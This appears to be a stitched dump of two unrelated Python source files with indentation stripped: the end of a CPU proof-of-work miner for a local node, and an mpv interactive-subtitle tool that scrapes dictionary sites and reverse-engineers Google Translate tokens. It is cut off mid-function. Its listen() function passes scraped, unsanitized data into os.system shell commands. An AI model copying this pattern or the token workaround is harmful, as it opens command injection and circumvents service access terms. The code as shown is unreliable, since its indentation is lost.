resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
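# Usage sketch (hedged; host, port and credentials are placeholders that must
# match the node's RPC settings):
#
#   rpc = EvolveChainRPC('127.0.0.1', 9877, 'someuser', 'somepassword')
#   print rpc.getblockcount()
#   work = rpc.getwork()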
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
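# e.g. bytereverse(0x12345678) == 0x78563412 (reverses the byte order of a 32-bit word)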
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = EvolveChainRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 9877
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
interSubs.py
|
#! /usr/bin/env python
# v. 2.10
# Interactive subtitles for `mpv` for language learners.
import os, subprocess, sys
import random, re, time
import requests
import threading, queue
import calendar, math, base64
import numpy
import ast
from bs4 import BeautifulSoup
from urllib.parse import quote
from json import loads
import warnings
from six.moves import urllib
from PyQt5.QtCore import Qt, QThread, QObject, pyqtSignal, pyqtSlot, QSize
from PyQt5.QtWidgets import QApplication, QFrame, QVBoxLayout, QHBoxLayout, QLabel, QSizePolicy, QWidget
from PyQt5.QtGui import QPalette, QPaintEvent, QPainter, QPainterPath, QFont, QFontMetrics, QColor, QPen, QBrush
pth = os.path.expanduser('~/.config/mpv/scripts/')
os.chdir(pth)
import interSubs_config as config
pons_combos = ['enes', 'enfr', 'deen', 'enpl', 'ensl', 'defr', 'dees', 'deru', 'depl', 'desl', 'deit', 'dept', 'detr', 'deel', 'dela', 'espl', 'frpl', 'itpl', 'plru', 'essl', 'frsl', 'itsl', 'enit', 'enpt', 'enru', 'espt', 'esfr', 'delb', 'dezh', 'enzh', 'eszh', 'frzh', 'denl', 'arde', 'aren', 'dade', 'csde', 'dehu', 'deno', 'desv', 'dede', 'dedx']
# returns ([[word, translation]..], [morphology = '', gender = ''])
# pons.com
def pons(word):
if config.lang_from + config.lang_to in pons_combos:
url = 'http://en.pons.com/translate?q=%s&l=%s%s&in=%s' % (quote(word), config.lang_from, config.lang_to, config.lang_from)
else:
url = 'http://en.pons.com/translate?q=%s&l=%s%s&in=%s' % (quote(word), config.lang_to, config.lang_from, config.lang_from)
pairs = []
fname = 'urls/' + url.replace('/', "-")
try:
p = open(fname).read().split('=====/////-----')
try:
word_descr = p[1].strip()
except:
word_descr = ''
if len(p[0].strip()):
for pi in p[0].strip().split('\n\n'):
pi = pi.split('\n')
pairs.append([pi[0], pi[1]])
except:
p = requests.get(url, headers={'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36'}).text
soup = BeautifulSoup(p, "lxml")
trs = soup.find_all('dl')
for tr in trs:
try:
tr1 = tr.find('dt').find('div', class_="source").get_text()
tr1 = re.sub('\n|\r|\t', ' ', tr1)
tr1 = re.sub(' +', ' ', tr1).strip()
if not len(tr1):
tr1 = '-'
tr2 = tr.find('dd').find('div', class_="target").get_text()
tr2 = re.sub('\n|\r|\t', ' ', tr2)
tr2 = re.sub(' +', ' ', tr2).strip()
if not len(tr2):
tr2 = '-'
except:
continue
pairs.append([tr1, tr2])
if config.number_of_translations_to_save and len(pairs) > config.number_of_translations_to_save:
break
try:
word_descr = soup.find_all('h2', class_='')
if '<i class="icon-bolt">' not in str(word_descr[0]):
word_descr = re.sub('\n|\r|\t', ' ', word_descr[0].get_text())
				word_descr = re.sub(' +', ' ', word_descr).replace('&lt;', '<').replace('&gt;', '>').replace(' · ', '·').replace(' , ', ', ').strip()
else:
word_descr = ''
except:
word_descr = ''
		# extra check against double-writing from rogue threads
if not os.path.isfile(fname):
print('\n\n'.join(e[0] + '\n' + e[1] for e in pairs), file=open(fname, 'a'))
print('\n'+'=====/////-----'+'\n', file=open(fname, 'a'))
print(word_descr, file=open(fname, 'a'))
if len(word_descr):
if word_descr.split(' ')[-1] == 'm':
word_descr_gen = [word_descr[:-2], 'm']
elif word_descr.split(' ')[-1] == 'f':
word_descr_gen = [word_descr[:-2], 'f']
elif word_descr.split(' ')[-1] == 'nt':
word_descr_gen = [word_descr[:-3], 'nt']
else:
word_descr_gen = [word_descr, '']
else:
word_descr_gen = ['', '']
return pairs, word_descr_gen
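# Illustrative return shape for pons() (the translation pair is a hypothetical
# placeholder):
#
#   pairs, (descr, gender) = pons('Haus')
#   # pairs  -> [['Haus', 'house'], ...]   list of [source, translation] pairs
#   # descr  -> headword description, '' when unavailable
#   # gender -> 'm', 'f', 'nt' or ''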
# https://github.com/ssut/py-googletrans
class TokenAcquirer_DISABLED:
"""Google Translate API token generator
translate.google.com uses a token to authorize the requests. If you are
not Google, you do have this token and will have to pay for use.
This class is the result of reverse engineering on the obfuscated and
minified code used by Google to generate such token.
The token is based on a seed which is updated once per hour and on the
text that will be translated.
Both are combined - by some strange math - in order to generate a final
token (e.g. 744915.856682) which is used by the API to validate the
request.
This operation will cause an additional request to get an initial
token from translate.google.com.
Example usage:
>>> from googletrans.gtoken import TokenAcquirer
>>> acquirer = TokenAcquirer()
>>> text = 'test'
>>> tk = acquirer.do(text)
>>> tk
950629.577246
"""
import httpx
def rshift(self, val, n):
"""python port for '>>>'(right shift with padding)
"""
return (val % 0x100000000) >> n
RE_TKK = re.compile(r'tkk:\'(.+?)\'', re.DOTALL)
RE_RAWTKK = re.compile(r'tkk:\'(.+?)\'', re.DOTALL)
def __init__(self, client = httpx, tkk='0', host='translate.googleapis.com'):
self.client = client
self.tkk = tkk
self.host = host if 'http' in host else 'http://' + host
def _update(self):
"""update tkk
"""
# we don't need to update the base TKK value when it is still valid
now = math.floor(int(time.time() * 1000) / 3600000.0)
if self.tkk and int(self.tkk.split('.')[0]) == now:
return
r = self.client.get(self.host)
raw_tkk = self.RE_TKK.search(r.text)
if raw_tkk:
self.tkk = raw_tkk.group(1)
return
try:
# this will be the same as python code after stripping out a reserved word 'var'
code = self.RE_TKK.search(r.text).group(1).replace('var ', '')
# unescape special ascii characters such like a \x3d(=)
code = code.encode().decode('unicode-escape')
except AttributeError:
raise Exception('Could not find TKK token for this request.\nSee https://github.com/ssut/py-googletrans/issues/234 for more details.')
except:
raise
if code:
tree = ast.parse(code)
visit_return = False
operator = '+'
n, keys = 0, dict(a=0, b=0)
for node in ast.walk(tree):
if isinstance(node, ast.Assign):
name = node.targets[0].id
if name in keys:
if isinstance(node.value, ast.Num):
keys[name] = node.value.n
# the value can sometimes be negative
elif isinstance(node.value, ast.UnaryOp) and \
isinstance(node.value.op, ast.USub): # pragma: nocover
keys[name] = -node.value.operand.n
elif isinstance(node, ast.Return):
# parameters should be set after this point
visit_return = True
elif visit_return and isinstance(node, ast.Num):
n = node.n
elif visit_return and n > 0:
# the default operator is '+' but implement some more for
# all possible scenarios
if isinstance(node, ast.Add): # pragma: nocover
pass
elif isinstance(node, ast.Sub): # pragma: nocover
operator = '-'
elif isinstance(node, ast.Mult): # pragma: nocover
operator = '*'
elif isinstance(node, ast.Pow): # pragma: nocover
operator = '**'
elif isinstance(node, ast.BitXor): # pragma: nocover
operator = '^'
# a safety way to avoid Exceptions
clause = compile('{1}{0}{2}'.format(
operator, keys['a'], keys['b']), '', 'eval')
value = eval(clause, dict(__builtin__={}))
result = '{}.{}'.format(n, value)
self.tkk = result
def _lazy(self, value):
"""like lazy evaluation, this method returns a lambda function that
returns value given.
We won't be needing this because this seems to have been built for
code obfuscation.
the original code of this method is as follows:
... code-block: javascript
var ek = function(a) {
return function() {
return a;
};
}
"""
return lambda: value
def _xr(self, a, b):
size_b = len(b)
c = 0
while c < size_b - 2:
d = b[c + 2]
d = ord(d[0]) - 87 if 'a' <= d else int(d)
			d = self.rshift(a, d) if '+' == b[c + 1] else a << d
a = a + d & 4294967295 if '+' == b[c] else a ^ d
c += 3
return a
def acquire(self, text):
a = []
# Convert text to ints
for i in text:
val = ord(i)
if val < 0x10000:
a += [val]
else:
# Python doesn't natively use Unicode surrogates, so account for those
a += [
math.floor((val - 0x10000) / 0x400 + 0xD800),
math.floor((val - 0x10000) % 0x400 + 0xDC00)
]
b = self.tkk if self.tkk != '0' else ''
d = b.split('.')
b = int(d[0]) if len(d) > 1 else 0
# assume e means char code array
e = []
g = 0
size = len(a)
while g < size:
l = a[g]
# just append if l is less than 128(ascii: DEL)
if l < 128:
e.append(l)
# append calculated value if l is less than 2048
else:
if l < 2048:
e.append(l >> 6 | 192)
else:
# append calculated value if l matches special condition
if (l & 64512) == 55296 and g + 1 < size and \
a[g + 1] & 64512 == 56320:
g += 1
l = 65536 + ((l & 1023) << 10) + (a[g] & 1023) # This bracket is important
e.append(l >> 18 | 240)
e.append(l >> 12 & 63 | 128)
else:
e.append(l >> 12 | 224)
e.append(l >> 6 & 63 | 128)
e.append(l & 63 | 128)
g += 1
a = b
for i, value in enumerate(e):
a += value
a = self._xr(a, '+-a^+6')
a = self._xr(a, '+-3^+b+-f')
a ^= int(d[1]) if len(d) > 1 else 0
if a < 0: # pragma: nocover
a = (a & 2147483647) + 2147483648
a %= 1000000 # int(1E6)
return '{}.{}'.format(a, a ^ b)
def do(self, text):
self._update()
tk = self.acquire(text)
return tk
# https://github.com/Saravananslb/py-googletranslation
class TokenAcquirer:
"""Google Translate API token generator
translate.google.com uses a token to authorize the requests. If you are
not Google, you do have this token and will have to pay for use.
This class is the result of reverse engineering on the obfuscated and
minified code used by Google to generate such token.
The token is based on a seed which is updated once per hour and on the
text that will be translated.
Both are combined - by some strange math - in order to generate a final
token (e.g. 464393.115905) which is used by the API to validate the
request.
This operation will cause an additional request to get an initial
token from translate.google.com.
Example usage:
>>> from pygoogletranslation.gauthtoken import TokenAcquirer
>>> acquirer = TokenAcquirer()
>>> text = 'test'
>>> tk = acquirer.do(text)
>>> tk
464393.115905
"""
def __init__(self, tkk='0', tkk_url='https://translate.google.com/translate_a/element.js', proxies=None):
if proxies is not None:
self.proxies = proxies
else:
self.proxies = None
r = requests.get(tkk_url, proxies=self.proxies)
if r.status_code == 200:
re_tkk = re.search("(?<=tkk=\\')[0-9.]{0,}", str(r.content.decode("utf-8")))
if re_tkk:
self.tkk = re_tkk.group(0)
else:
self.tkk = '0'
else:
self.tkk = '0'
def _xr(self, a, b):
size_b = len(b)
c = 0
while c < size_b - 2:
d = b[c + 2]
d = ord(d[0]) - 87 if 'a' <= d else int(d)
d = self.rshift(a, d) if '+' == b[c + 1] else a << d
a = a + d & 4294967295 if '+' == b[c] else a ^ d
c += 3
return a
def acquire(self, text):
a = []
# Convert text to ints
for i in text:
val = ord(i)
if val < 0x10000:
a += [val]
else:
# Python doesn't natively use Unicode surrogates, so account for those
a += [
math.floor((val - 0x10000) / 0x400 + 0xD800),
math.floor((val - 0x10000) % 0x400 + 0xDC00)
]
b = self.tkk
d = b.split('.')
b = int(d[0]) if len(d) > 1 else 0
# assume e means char code array
e = []
g = 0
size = len(a)
while g < size:
l = a[g]
# just append if l is less than 128(ascii: DEL)
if l < 128:
e.append(l)
# append calculated value if l is less than 2048
else:
if l < 2048:
e.append(l >> 6 | 192)
else:
# append calculated value if l matches special condition
if (l & 64512) == 55296 and g + 1 < size and \
a[g + 1] & 64512 == 56320:
g += 1
l = 65536 + ((l & 1023) << 10) + (a[g] & 1023) # This bracket is important
e.append(l >> 18 | 240)
e.append(l >> 12 & 63 | 128)
else:
e.append(l >> 12 | 224)
e.append(l >> 6 & 63 | 128)
e.append(l & 63 | 128)
g += 1
a = b
for i, value in enumerate(e):
a += value
a = self._xr(a, '+-a^+6')
a = self._xr(a, '+-3^+b+-f')
a ^= int(d[1]) if len(d) > 1 else 0
if a < 0: # pragma: nocover
a = (a & 2147483647) + 2147483648
a %= 1000000 # int(1E6)
return '{}.{}'.format(a, a ^ b)
def do(self, text):
tk = self.acquire(text)
return tk
def rshift(self, val, n):
"""python port for '>>>'(right shift with padding)
"""
return (val % 0x100000000) >> n
# translate.google.com
def google(word):
word = word.replace('\n', ' ').strip()
url = 'https://translate.google.com/translate_a/single?client=t&sl={lang_from}&tl={lang_to}&hl={lang_to}&dt=at&dt=bd&dt=ex&dt=ld&dt=md&dt=qca&dt=rw&dt=rm&dt=ss&dt=t&ie=UTF-8&oe=UTF-8&otf=1&pc=1&ssel=3&tsel=3&kc=2&q={word}'.format(lang_from = config.lang_from, lang_to = config.lang_to, word = quote(word))
pairs = []
fname = 'urls/' + url.replace('/', "-")
try:
if ' ' in word:
raise Exception('skip saving')
p = open(fname).read().split('=====/////-----')
try:
word_descr = p[1].strip()
except:
word_descr = ''
for pi in p[0].strip().split('\n\n'):
pi = pi.split('\n')
pairs.append([pi[0], pi[1]])
except:
acquirer = TokenAcquirer()
tk = acquirer.do(word)
url = '{url}&tk={tk}'.format(url = url, tk = tk)
p = requests.get(url, headers={'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36'}).text
p = loads(p)
try:
pairs.append([p[0][0][0], p[0][0][1]])
except:
pass
if p[1] != None:
for translations in p[1]:
for translation in translations[2]:
try:
t1 = translation[5] + ' ' + translation[0]
except:
t1 = translation[0]
t2 = ', '.join(translation[1])
if not len(t1):
t1 = '-'
if not len(t2):
t2 = '-'
pairs.append([t1, t2])
word_descr = ''
		# extra check against double-writing from rogue threads
if ' ' not in word and not os.path.isfile(fname):
print('\n\n'.join(e[0] + '\n' + e[1] for e in pairs), file=open(fname, 'a'))
print('\n'+'=====/////-----'+'\n', file=open(fname, 'a'))
print(word_descr, file=open(fname, 'a'))
return pairs, ['', '']
# reverso.net
def reverso(word):
reverso_combos = {'ar':'Arabic', 'de':'German', 'en':'English', 'es':'Spanish', 'fr':'French', 'he':'Hebrew', 'it':'Italian', 'nl':'Dutch', 'pl':'Polish', 'pt':'Portuguese', 'ro':'Romanian', 'ru':'Russian'}
	if config.lang_from not in reverso_combos or config.lang_to not in reverso_combos:
return [['Language code is not correct.', '']], ['', '']
url = 'http://context.reverso.net/translation/%s-%s/%s' % (reverso_combos[config.lang_from].lower(), reverso_combos[config.lang_to].lower(), quote(word))
pairs = []
fname = 'urls/' + url.replace('/', "-")
try:
p = open(fname).read().split('=====/////-----')
if len(p[0].strip()):
for pi in p[0].strip().split('\n\n'):
pi = pi.split('\n')
pairs.append([pi[0], pi[1]])
except:
p = requests.get(url, headers={'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36'}).text
soup = BeautifulSoup(p, "lxml")
trs = soup.find_all(class_ = re.compile('translation.*ltr.*'))
exmpls = soup.find_all(class_ = 'example')
tr_combined = []
for tr in trs:
tr_combined.append(tr.get_text().strip().replace('\n', ' '))
if len(tr_combined) == 4:
pairs.append(['-', ' :: '.join(tr_combined)])
tr_combined = []
for exmpl in exmpls:
pairs.append([x.strip() for x in exmpl.get_text().split('\n') if len(x.strip())])
		# extra check against double-writing from rogue threads
if not os.path.isfile(fname):
print('\n\n'.join(e[0] + '\n' + e[1] for e in pairs), file=open(fname, 'a'))
print('\n'+'=====/////-----'+'\n', file=open(fname, 'a'))
return pairs, ['', '']
# linguee.com (unfinished; site blocks frequent requests)
def linguee(word):
url = 'https://www.linguee.com/german-english/search?source=german&query=%s' % quote(word)
pairs = []
fname = 'urls/' + url.replace('/', "-")
try:
p = open(fname).read().split('=====/////-----')
try:
word_descr = p[1].strip()
except:
word_descr = ''
for pi in p[0].strip().split('\n\n'):
pi = pi.split('\n')
pairs.append([pi[0], pi[1]])
except:
#p = open('/home/lom/d/1.html', encoding="ISO-8859-15").read()
p = requests.get(url, headers={'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36'}).text
soup = BeautifulSoup(p, "lxml")
trs = soup.find_all('div', class_="lemma featured")
for tr in trs:
pairs.append([tr.find_all('a')[0].get_text(), '-'])
for tr2 in tr.find_all('a')[1:]:
if len(tr2.get_text()):
#print(tr2.get_text())
pairs.append(['-', tr2.get_text()])
word_descr = ''
		# extra check against double-writing from rogue threads
if not os.path.isfile(fname):
print('\n\n'.join(e[0] + '\n' + e[1] for e in pairs), file=open(fname, 'a'))
print('\n'+'=====/////-----'+'\n', file=open(fname, 'a'))
print(word_descr, file=open(fname, 'a'))
return pairs, ['', '']
# dict.cc
def dict_cc(word):
url = 'https://%s-%s.dict.cc/?s=%s' % (config.lang_from, config.lang_to, quote(word))
pairs = []
fname = 'urls/' + url.replace('/', "-")
try:
p = open(fname).read().split('=====/////-----')
try:
word_descr = p[1].strip()
except:
word_descr = ''
if len(p[0].strip()):
for pi in p[0].strip().split('\n\n'):
pi = pi.split('\n')
pairs.append([pi[0], pi[1]])
except:
p = requests.get(url, headers={'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36'}).text
p = re.sub('<div style="float:right;color:#999">\d*</div>', '', p)
p = re.sub('<span style="color:#666;font-size:10px;padding:0 2px;position:relative;top:-3px">\d*</span>', '', p)
soup = BeautifulSoup(p, "lxml")
trs = soup.find_all('tr', id = re.compile('tr\d*'))
for tr in trs:
tr2 = tr.find_all('td', class_ = 'td7nl')
pairs.append([tr2[1].get_text(), tr2[0].get_text()])
if config.number_of_translations_to_save and len(pairs) > config.number_of_translations_to_save:
break
word_descr = ''
		# extra check against double-writing from rogue threads
if not os.path.isfile(fname):
print('\n\n'.join(e[0] + '\n' + e[1] for e in pairs), file=open(fname, 'a'))
print('\n'+'=====/////-----'+'\n', file=open(fname, 'a'))
print(word_descr, file=open(fname, 'a'))
return pairs, ['', '']
# redensarten-index.de
def redensarten(word):
if len(word) < 3:
return [], ['', '']
url = 'https://www.redensarten-index.de/suche.php?suchbegriff=' + quote(word) + '&bool=relevanz&gawoe=an&suchspalte%5B%5D=rart_ou&suchspalte%5B%5D=rart_varianten_ou&suchspalte%5B%5D=erl_ou&suchspalte%5B%5D=erg_ou'
pairs = []
fname = 'urls/' + url.replace('/', "-")
try:
p = open(fname).read().split('=====/////-----')
try:
word_descr = p[1].strip()
except:
word_descr = ''
if len(p[0].strip()):
for pi in p[0].strip().split('\n\n'):
pi = pi.split('\n')
pairs.append([pi[0], pi[1]])
except:
p = requests.get(url, headers={'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36'})
p.encoding = 'utf-8'
p = p.text
soup = BeautifulSoup(p, "lxml")
for a in soup.find_all('a', class_ = 'autosyn-icon'):
a.decompose()
try:
table = soup.find_all('table', id = 'tabelle')[0]
trs = table.find_all('tr')
for tr in trs[1:]:
tds = tr.find_all('td')
if len(tds) > 1:
pairs.append([ re.sub(' +', ' ', tds[0].get_text()).strip(), re.sub(' +', ' ', tds[1].get_text()).strip() ])
except:
pass
word_descr = ''
		# extra check against double-writing from rogue threads
if not os.path.isfile(fname):
print('\n\n'.join(e[0] + '\n' + e[1] for e in pairs), file=open(fname, 'a'))
print('\n'+'=====/////-----'+'\n', file=open(fname, 'a'))
print(word_descr, file=open(fname, 'a'))
return pairs, ['', '']
# leo.org
def leo(word):
language = config.lang_from if config.lang_from != 'de' else config.lang_to
url = "https://dict.leo.org/dictQuery/m-vocab/%sde/query.xml?tolerMode=nof&rmWords=off&rmSearch=on&searchLoc=0&resultOrder=basic&multiwordShowSingle=on&lang=de&search=%s" % (language, word)
pairs = []
fname = 'urls/' + url.replace('/', "-")
try:
p = open(fname).read().split('=====/////-----')
try:
word_descr = p[1].strip()
except:
word_descr = ''
if len(p[0].strip()):
for pi in p[0].strip().split('\n\n'):
pi = pi.split('\n')
pairs.append([pi[0], pi[1]])
except:
req = requests.get(url.format(lang=language))
content = BeautifulSoup(req.text, "xml")
pairs = []
for section in content.sectionlist.findAll('section'):
if int(section['sctCount']):
for entry in section.findAll('entry'):
res0 = entry.find('side', attrs = {'hc' : '0'})
res1 = entry.find('side', attrs = {'hc' : '1'})
if res0 and res1:
line0 = re.sub('\s+', ' ', res0.repr.getText())
line1 = re.sub('\s+', ' ', res1.repr.getText())
line0 = line0.rstrip('|').strip()
line1 = line1.rstrip('|').strip()
if res0.attrs['lang'] == config.lang_from:
pairs.append([line0, line1])
else:
pairs.append([line1, line0])
word_descr = ''
		# extra check against double-writing from rogue threads
if not os.path.isfile(fname):
print('\n\n'.join(e[0] + '\n' + e[1] for e in pairs), file=open(fname, 'a'))
print('\n'+'=====/////-----'+'\n', file=open(fname, 'a'))
print(word_descr, file=open(fname, 'a'))
return pairs, ['', '']
# offline dictionary with word \t translation
def tab_divided_dict(word):
if word in offdict:
tr = re.sub('<.*?>', '', offdict[word]) if config.tab_divided_dict_remove_tags_B else offdict[word]
tr = tr.replace('\\n', '\n').replace('\\~', '~')
return [[tr, '-']], ['', '']
else:
return [], ['', '']
# morfix.co.il
def morfix(word):
url = "http://www.morfix.co.il/en/%s" % quote(word)
pairs = []
fname = 'urls/' + url.replace('/', "-")
try:
p = open(fname).read().split('=====/////-----')
try:
word_descr = p[1].strip()
except:
word_descr = ''
if len(p[0].strip()):
for pi in p[0].strip().split('\n\n'):
pi = pi.split('\n')
pairs.append([pi[0], pi[1]])
except:
req = requests.get(url)
soup = BeautifulSoup(req.text, "lxml")
divs = soup.find_all('div', class_ = 'title_ph')
pairs = []
for div in divs:
he = div.find('div', class_ = re.compile('translation_he'))
he = re.sub('\s+', ' ', he.get_text()).strip()
en = div.find('div', class_ = re.compile('translation_en'))
en = re.sub('\s+', ' ', en.get_text()).strip()
if config.lang_from == 'he':
pairs.append([he, en])
else:
pairs.append([en, he])
word_descr = ''
		# extra check against double-writing from rogue threads
if not os.path.isfile(fname):
print('\n\n'.join(e[0] + '\n' + e[1] for e in pairs), file=open(fname, 'a'))
print('\n'+'=====/////-----'+'\n', file=open(fname, 'a'))
print(word_descr, file=open(fname, 'a'))
return pairs, ['', '']
# deepl.com
# https://github.com/EmilioK97/pydeepl
def deepl(text):
l1 = config.lang_from.upper()
l2 = config.lang_to.upper()
if len(text) > 5000:
return 'Text too long (limited to 5000 characters).'
parameters = {
'jsonrpc': '2.0',
'method': 'LMT_handle_jobs',
'params': {
'jobs': [
{
'kind':'default',
'raw_en_sentence': text
}
],
'lang': {
'source_lang_user_selected': l1,
'target_lang': l2
}
}
}
response = requests.post('https://www2.deepl.com/jsonrpc', json=parameters).json()
if 'result' not in response:
		return 'DeepL call resulted in an unknown result.'
translations = response['result']['translations']
if len(translations) == 0 \
or translations[0]['beams'] is None \
or translations[0]['beams'][0]['postprocessed_sentence'] is None:
return 'No translations found.'
return translations[0]['beams'][0]['postprocessed_sentence']
def listen(word, type = 'gtts'):
if type == 'pons':
if config.lang_from + config.lang_to in pons_combos:
url = 'http://en.pons.com/translate?q=%s&l=%s%s&in=%s' % (quote(word), config.lang_from, config.lang_to, config.lang_from)
else:
url = 'http://en.pons.com/translate?q=%s&l=%s%s&in=%s' % (quote(word), config.lang_to, config.lang_from, config.lang_from)
p = requests.get(url, headers={'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36'}).text
x = re.findall('<dl id="([a-zA-Z0-9]*?)" class="dl-horizontal kne(.*?)</dl>', p, re.DOTALL)
x2 = re.findall('class="audio tts trackable trk-audio" data-pons-lang="(.*?)"', x[0][1])
for l in x2:
if config.lang_from in l:
mp3 = 'http://sounds.pons.com/audio_tts/%s/%s' % (l, x[0][0])
break
os.system('(cd /tmp; wget ' + mp3 + '; mpv --load-scripts=no --loop=1 --volume=40 --force-window=no ' + mp3.split('/')[-1] + '; rm ' + mp3.split('/')[-1] + ') &')
elif type == 'gtts':
gTTS(text = word, lang = config.lang_from, slow = False).save('/tmp/gtts_word.mp3')
os.system('(mpv --load-scripts=no --loop=1 --volume=75 --force-window=no ' + '/tmp/gtts_word.mp3' + '; rm ' + '/tmp/gtts_word.mp3' + ') &')
elif type == 'forvo':
url = 'https://forvo.com/word/%s/%s/' % (config.lang_from, quote(word))
try:
data = requests.get(url, headers={'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36'}).text
soup = BeautifulSoup(data, "lxml")
trs = soup.find_all('article', class_ = 'pronunciations')[0].find_all('span', class_ = 'play')
mp3s = ''
for tr in trs[:2]:
tr = tr['onclick']
tr = re.findall('Play\((.*?)\)', tr)[0]
tr = tr.split(',')[4].replace("'", '')
tr = base64.b64decode(tr)
tr = tr.decode("utf-8")
mp3s += 'mpv --load-scripts=no --loop=1 --volume=111 --force-window=no https://audio00.forvo.com/audios/mp3/%s ; ' % tr
os.system('(%s) &' % mp3s)
except:
return
# https://github.com/Boudewijn26/gTTS-token
class Token:
""" Token (Google Translate Token)
Generate the current token key and allows generation of tokens (tk) with it
Python version of `token-script.js` itself from translate.google.com
"""
SALT_1 = "+-a^+6"
SALT_2 = "+-3^+b+-f"
def __init__(self):
self.token_key = None
def calculate_token(self, text, seed=None):
""" Calculate the request token (`tk`) of a string
:param text: str The text to calculate a token for
:param seed: str The seed to use. By default this is the number of hours since epoch
"""
if seed is None:
seed = self._get_token_key()
[first_seed, second_seed] = seed.split(".")
try:
d = bytearray(text.encode('UTF-8'))
except UnicodeDecodeError:
